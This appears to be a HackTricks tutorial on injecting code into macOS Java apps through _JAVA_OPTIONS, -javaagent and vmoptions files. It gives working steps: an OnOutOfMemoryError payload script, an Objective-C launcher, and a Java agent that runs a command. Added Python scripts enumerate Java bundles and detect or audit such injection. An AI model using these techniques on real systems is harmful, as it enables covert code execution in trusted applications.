macOS Java Applications Injection

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Enumeration

Find the Java applications installed on the system. Java app bundles carry JVM parameters in their Info.plist (for example -Djava.* properties), so the substring java. is a usable marker to grep for:

# Search only in /Applications folder
sudo find /Applications -name 'Info.plist' -exec grep -l "java\." {} \; 2>/dev/null

# Full search
sudo find / -name 'Info.plist' -exec grep -l "java\." {} \; 2>/dev/null
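The same enumeration in Python, as an added example that is not part of the original page: it parses each Info.plist with plistlib (XML and binary plists alike), records which keys or values matched, and also reports the two things that make a bundle an easy injection target later on this page, a JavaApplicationStub launcher and any Contents/bin/*.vmoptions file. The marker strings beyond java. (JVMOptions, JVMMainClassName, JVMRuntime) are keys used by common Java app bundlers and are an assumption; the sample bundles are constructed in a temporary directory.

```python
import os
import plistlib
import tempfile

# Markers that identify a JVM-backed bundle. "java." is what the page greps for
# (-Djava.* properties); the other keys come from common Java bundlers
# (appbundler / JavaAppLauncher) and are an assumption, not an exhaustive list.
JAVA_MARKERS = ("java.", "jvmoptions", "jvmmainclassname", "jvmruntime",
                "javaapplicationstub")


def _strings(node, path=""):
    """Yield (key_path, string) for every key and string value in a parsed plist."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield (path, str(key))
            yield from _strings(value, f"{path}/{key}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from _strings(value, f"{path}[{i}]")
    elif isinstance(node, str):
        yield (path, node)


def inspect_bundle(app_path):
    """Return evidence that app_path is a Java app bundle, or None if it is not."""
    plist_path = os.path.join(app_path, "Contents", "Info.plist")
    try:
        with open(plist_path, "rb") as fh:
            info = plistlib.load(fh)          # handles XML and binary plists
    except (OSError, plistlib.InvalidFileException, ValueError):
        return None
    hits = [(p, s) for p, s in _strings(info)
            if any(m in s.lower() for m in JAVA_MARKERS)]
    stub = os.path.join(app_path, "Contents", "MacOS", "JavaApplicationStub")
    bin_dir = os.path.join(app_path, "Contents", "bin")
    vmoptions = []
    if os.path.isdir(bin_dir):                # JetBrains-style launchers keep <exe>.vmoptions here
        vmoptions = sorted(os.path.join(bin_dir, f) for f in os.listdir(bin_dir)
                           if f.endswith(".vmoptions"))
    if not (hits or vmoptions or os.path.exists(stub)):
        return None
    return {"app": app_path, "plist_hits": hits,
            "has_stub": os.path.exists(stub), "vmoptions": vmoptions}


def find_java_apps(root):
    """Walk root (e.g. /Applications) and return evidence for every Java bundle found."""
    found = []
    for dirpath, dirnames, _ in os.walk(root):
        for name in dirnames:
            if name.endswith(".app"):
                evidence = inspect_bundle(os.path.join(dirpath, name))
                if evidence:
                    found.append(evidence)
    return sorted(found, key=lambda e: e["app"])


def demo():
    """Constructed sample: one Java bundle and one plain bundle in a temp dir."""
    root = tempfile.mkdtemp()
    java_app = os.path.join(root, "FakeIDE.app", "Contents")
    os.makedirs(os.path.join(java_app, "bin"))
    with open(os.path.join(java_app, "Info.plist"), "wb") as fh:
        plistlib.dump({"CFBundleName": "FakeIDE",
                       "JVMOptions": ["-Djava.library.path=$APP_ROOT/Contents/MacOS"]}, fh)
    open(os.path.join(java_app, "bin", "fakeide.vmoptions"), "w").close()
    plain_app = os.path.join(root, "Plain.app", "Contents")
    os.makedirs(plain_app)
    with open(os.path.join(plain_app, "Info.plist"), "wb") as fh:
        plistlib.dump({"CFBundleName": "Plain"}, fh)
    return find_java_apps(root)


if __name__ == "__main__":
    import sys
    results = find_java_apps(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for e in results:
        print(e["app"], "(JavaApplicationStub)" if e["has_stub"] else "")
        for p, s in e["plist_hits"]:
            print("   plist", p or "/", "=", s)
        for v in e["vmoptions"]:
            print("   vmoptions", v)
```

Run it as `python3 find_java_apps.py /Applications`; without an argument it scans the constructed sample instead.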

_JAVA_OPTIONS

The environment variable _JAVA_OPTIONS can be used to inject arbitrary JVM parameters into the execution of any Java-compiled app (HotSpot reads it during VM initialisation, so it also works for apps started through a native launcher stub):

# Write your payload in a script called /tmp/payload.sh and make it executable (chmod +x):
# the JVM runs the OnOutOfMemoryError command through /bin/sh -c
export _JAVA_OPTIONS='-Xms2m -Xmx5m -XX:OnOutOfMemoryError="/tmp/payload.sh"'
"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"

To run it as a new process rather than as a child of the current terminal you can use:

#import <Foundation/Foundation.h>
// clang -fobjc-arc -framework Foundation invoker.m -o invoker

int main(int argc, const char * argv[]) {
    @autoreleasepool {
        // Specify the file path and content of the payload script
        NSString *filePath = @"/tmp/payload.sh";
        NSString *content = @"#!/bin/bash\n/Applications/iTerm.app/Contents/MacOS/iTerm2";

        NSError *error = nil;

        // Write content to the file
        BOOL success = [content writeToFile:filePath
                                 atomically:YES
                                   encoding:NSUTF8StringEncoding
                                      error:&error];

        if (!success) {
            NSLog(@"Error writing file at %@\n%@", filePath, [error localizedDescription]);
            return 1;
        }

        // The JVM runs the OnOutOfMemoryError command via /bin/sh -c, so the script
        // must be executable (writeToFile: creates it without the execute bit)
        if (![[NSFileManager defaultManager] setAttributes:@{NSFilePosixPermissions: @0755}
                                              ofItemAtPath:filePath
                                                     error:&error]) {
            NSLog(@"Error making %@ executable\n%@", filePath, [error localizedDescription]);
            return 1;
        }

        NSLog(@"File written successfully to %@", filePath);

        // Create a new task
        NSTask *task = [[NSTask alloc] init];

        // Set the task's launch path to use the 'open' command
        [task setLaunchPath:@"/usr/bin/open"];

        NSString *javaOptions = @"-Xms2m -Xmx5m -XX:OnOutOfMemoryError=/tmp/payload.sh";

        // Arguments for the 'open' command, specifying the path to Android Studio.
        // open does not pass its own environment on to the app it launches, so the
        // variable is also handed over explicitly with --env (as later on this page)
        [task setArguments:@[@"--env", [@"_JAVA_OPTIONS=" stringByAppendingString:javaOptions],
                             @"/Applications/Android Studio.app"]];

        // Define custom environment variables
        NSDictionary *customEnvironment = @{ @"_JAVA_OPTIONS": javaOptions };

        // Get the current environment and merge it with custom variables
        NSMutableDictionary *environment = [NSMutableDictionary dictionaryWithDictionary:[[NSProcessInfo processInfo] environment]];
        [environment addEntriesFromDictionary:customEnvironment];

        // Set the task's environment
        [task setEnvironment:environment];

        // Launch the task and wait for 'open' to return
        [task launch];
        [task waitUntilExit];
    }
    return 0;
}

However, this causes an error in the targeted app (it dies with the OutOfMemoryError the tiny heap provokes). A stealthier way is to create a Java agent and load it with:

export _JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'
"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"

# Or

open --env "_JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'" -a "Burp Suite Professional"

Compiling the agent with a newer Java version than the one bundled with the app makes the agent class unloadable (UnsupportedClassVersionError), which aborts the JVM startup and therefore both the agent and the app. Compile with javac --release matching the app's bundled runtime.

Where the agent can be:

Agent.java
import java.io.*;
import java.lang.instrument.*;

public class Agent {
    // Called by the JVM before the app's main() because of Premain-Class in the manifest
    public static void premain(String args, Instrumentation inst) {
        try {
            String[] commands = new String[] { "/usr/bin/open", "-a", "Calculator" };
            Runtime.getRuntime().exec(commands);
        }
        catch (Exception err) {
            err.printStackTrace();
        }
    }
}

To build the agent, run:

javac Agent.java # Create Agent.class
jar cvfm Agent.jar manifest.txt Agent.class # Create Agent.jar

With manifest.txt containing:

Premain-Class: Agent
Agent-Class: Agent
Can-Redefine-Classes: true
Can-Retransform-Classes: true

Then set the environment variable and run the Java application as follows:

export _JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'
"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"

# Or

open --env "_JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'" -a "Burp Suite Professional"
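The defensive counterpart of both tricks above (the OnOutOfMemoryError command and the -javaagent), as an added example that is not part of the original page: a Python filter for eslogger exec events that flags any process whose JVM environment variables or argv carry an option able to run foreign code. The JSON field names it reads (event.exec.target.executable.path, event.exec.args, event.exec.env as "KEY=VALUE" strings) are the eslogger exec layout as I know it and are an assumption here; the sample events are constructed, not captured.

```python
import json
import sys

# Environment variables HotSpot itself reads at VM startup, so they work even when
# the JVM is embedded through JNI by a launcher such as JavaApplicationStub.
# JDK_JAVA_OPTIONS is only honoured by the `java` launcher binary, but is cheap to check.
JVM_ENV_VARS = ("_JAVA_OPTIONS", "JAVA_TOOL_OPTIONS", "JDK_JAVA_OPTIONS")

# Option prefixes that load foreign code into, or run a command from, the JVM.
INJECT_FLAGS = ("-javaagent:", "-agentpath:", "-agentlib:", "-Xrun",
                "-XX:OnOutOfMemoryError=", "-XX:OnError=",
                "-XX:VMOptionsFile=", "-Xbootclasspath")


def suspicious_tokens(text):
    """Return the injection-capable option prefixes present in text."""
    return [flag for flag in INJECT_FLAGS if flag in text]


def check_exec_event(event):
    """Inspect one parsed eslogger event; return [(exe, where, flags), ...].

    Assumed eslogger layout for exec events: event.exec.target.executable.path,
    event.exec.args (list of str) and event.exec.env (list of "KEY=VALUE").
    """
    ex = event.get("event", {}).get("exec")
    if not isinstance(ex, dict):
        return []                              # not an exec event
    exe = ex.get("target", {}).get("executable", {}).get("path", "?")
    findings = []
    for kv in ex.get("env", []):
        name, _, value = kv.partition("=")
        if name in JVM_ENV_VARS:
            hits = suspicious_tokens(value)
            if hits:
                findings.append((exe, f"env {name}", hits))
    for arg in ex.get("args", []):
        hits = suspicious_tokens(arg)
        if hits:
            findings.append((exe, "argv", hits))
    return findings


def scan_eslogger_lines(lines):
    """Run check_exec_event over a stream of JSON lines (one event per line)."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue                           # skip anything that is not a JSON object
        findings.extend(check_exec_event(event))
    return findings


# Constructed sample events (not real eslogger output), shaped as described above.
STUB = "/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"
SAMPLE_EVENTS = [
    json.dumps({"event": {"exec": {"target": {"executable": {"path": STUB}},
                                   "args": [STUB],
                                   "env": ["HOME=/Users/alice",
                                           "_JAVA_OPTIONS=-javaagent:/tmp/Agent.jar"]}}}),
    json.dumps({"event": {"exec": {"target": {"executable": {"path": "/usr/bin/java"}},
                                   "args": ["java", "-XX:OnOutOfMemoryError=/tmp/payload.sh",
                                            "-jar", "/tmp/app.jar"],
                                   "env": ["HOME=/Users/alice"]}}}),
    json.dumps({"event": {"exec": {"target": {"executable": {"path": "/bin/ls"}},
                                   "args": ["ls", "-la"],
                                   "env": ["_JAVA_OPTIONS=-Xmx2g"]}}}),   # benign tuning only
    json.dumps({"event": {"open": {"file": {"path": "/tmp/x"}}}}),          # not an exec
]

if __name__ == "__main__":
    # Live use:  sudo eslogger exec | python3 detect_java_injection.py
    source = SAMPLE_EVENTS if sys.stdin.isatty() else sys.stdin
    for exe, where, flags in scan_eslogger_lines(source):
        print(f"ALERT {exe}: {where} carries {', '.join(flags)}")
```

Matching on option prefixes rather than exact values also catches the quoted form used with open --env above, since the quotes end up inside the variable's value.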

vmoptions file

This file lets JVM parameters be specified for the app when the JVM starts. You can use the previous tricks to change the Java params here and make the process execute arbitrary commands. Moreover, this file can also pull in other files through an include directive, so modifying an included file works just as well.

Even more, some Java apps load more than one vmoptions file.

Some applications, like Android Studio, print in their output where they look for these files, for example:

/Applications/Android\ Studio.app/Contents/MacOS/studio 2>&1 | grep vmoptions

2023-12-13 19:53:23.920 studio[74913:581359] fullFileName is: /Applications/Android Studio.app/Contents/bin/studio.vmoptions
2023-12-13 19:53:23.920 studio[74913:581359] fullFileName exists: /Applications/Android Studio.app/Contents/bin/studio.vmoptions
2023-12-13 19:53:23.920 studio[74913:581359] parseVMOptions: /Applications/Android Studio.app/Contents/bin/studio.vmoptions
2023-12-13 19:53:23.921 studio[74913:581359] parseVMOptions: /Applications/Android Studio.app.vmoptions
2023-12-13 19:53:23.922 studio[74913:581359] parseVMOptions: /Users/carlospolop/Library/Application Support/Google/AndroidStudio2022.3/studio.vmoptions
2023-12-13 19:53:23.923 studio[74913:581359] parseVMOptions: platform=20 user=1 file=/Users/carlospolop/Library/Application Support/Google/AndroidStudio2022.3/studio.vmoptions

If they don't, you can easily check with:

# Monitor
sudo eslogger lookup | grep vmoption # the Terminal needs Full Disk Access for eslogger to work

# Launch the Java app
/Applications/Android\ Studio.app/Contents/MacOS/studio

Note how interesting it is that Android Studio in this example tries to load /Applications/Android Studio.app.vmoptions: /Applications is group-writable by admin, so any member of the admin group can create that file and have its JVM flags (a -javaagent, for instance) loaded by the IDE, without modifying, and thereby invalidating the signature of, the app bundle itself.
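To turn that observation into a repeatable check, here is an added Python audit (not the page's code) that, given an app bundle, the launcher's executable name and the user's Application Support directory for that product, lists the candidate vmoptions locations seen in the Android Studio output above, reports who can write each one (or who can create it in its parent directory when it does not exist yet) and scans existing files for agent or OnOutOfMemoryError style flags. The candidate list is derived from that output and is an assumption for other JetBrains-style launchers; the sample bundle is constructed in a temporary directory whose permissions are set to mirror /Applications.

```python
import grp
import os
import pwd
import stat
import tempfile

# Options that hand execution to attacker-controlled code when present in a vmoptions file.
INJECT_FLAGS = ("-javaagent:", "-agentpath:", "-agentlib:", "-Xrun",
                "-XX:OnOutOfMemoryError=", "-XX:OnError=",
                "-XX:VMOptionsFile=", "-Xbootclasspath")


def candidate_vmoptions_paths(app_path, exe_name, user_support_dir=None):
    """Locations in the order the Android Studio launcher printed them on this page
    (assumed to generalise to other JetBrains-style launchers)."""
    paths = [os.path.join(app_path, "Contents", "bin", exe_name + ".vmoptions"),
             app_path.rstrip("/") + ".vmoptions"]            # sibling of the bundle
    if user_support_dir:
        paths.append(os.path.join(user_support_dir, exe_name + ".vmoptions"))
    return paths


def _name(lookup, ident):
    try:
        return lookup(ident)
    except KeyError:                                        # uid/gid without a passwd/group entry
        return str(ident)


def writers_of(path):
    """Return (checked_path, principals) able to write path; if path does not exist,
    walk up to the nearest existing ancestor, i.e. who could create it."""
    target = os.path.abspath(path)
    while not os.path.exists(target):
        target = os.path.dirname(target)
    st = os.stat(target)
    who = []
    if st.st_mode & stat.S_IWUSR:
        who.append("owner " + _name(lambda u: pwd.getpwuid(u).pw_name, st.st_uid))
    if st.st_mode & stat.S_IWGRP:
        who.append("group " + _name(lambda g: grp.getgrgid(g).gr_name, st.st_gid))
    if st.st_mode & stat.S_IWOTH:
        who.append("everyone")
    return target, who


def audit_vmoptions(app_path, exe_name, user_support_dir=None):
    report = []
    for path in candidate_vmoptions_paths(app_path, exe_name, user_support_dir):
        exists = os.path.isfile(path)
        checked, who = writers_of(path)
        flags = []
        if exists:
            with open(path, errors="replace") as fh:
                for line in fh:
                    line = line.strip()
                    if line and not line.startswith("#"):   # '#' starts a comment line
                        flags += [f for f in INJECT_FLAGS if f in line]
        report.append({"path": path, "exists": exists, "checked": checked,
                       "writable_by": who, "me_can_write": os.access(checked, os.W_OK),
                       "flags": flags})
    return report


def demo():
    """Constructed sample: a bundle whose bin/ vmoptions already carries an agent, placed
    in a group-writable directory like /Applications (root:admin 775 on macOS)."""
    root = tempfile.mkdtemp()
    os.chmod(root, 0o775)
    app = os.path.join(root, "FakeIDE.app")
    os.makedirs(os.path.join(app, "Contents", "bin"))
    with open(os.path.join(app, "Contents", "bin", "fakeide.vmoptions"), "w") as fh:
        fh.write("# memory tuning\n-Xmx2g\n-javaagent:/tmp/Agent.jar\n")
    return audit_vmoptions(app, "fakeide")


if __name__ == "__main__":
    import sys
    # Real use, e.g.: audit_vmoptions.py "/Applications/Android Studio.app" studio \
    #   "$HOME/Library/Application Support/Google/AndroidStudio2022.3"
    if len(sys.argv) >= 3:
        report = audit_vmoptions(sys.argv[1], sys.argv[2],
                                 sys.argv[3] if len(sys.argv) > 3 else None)
    else:
        report = demo()
    for r in report:
        state = "present" if r["exists"] else "absent, creatable in " + r["checked"]
        line = f"{r['path']}: {state}; writable by {', '.join(r['writable_by']) or 'nobody'}"
        if r["flags"]:
            line += "; INJECTION FLAGS: " + ", ".join(r["flags"])
        print(line)
```

Reporting the nearest existing ancestor for absent files is the part that matters: the sibling .vmoptions does not exist on a clean install, and the question is who is allowed to bring it into existence.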
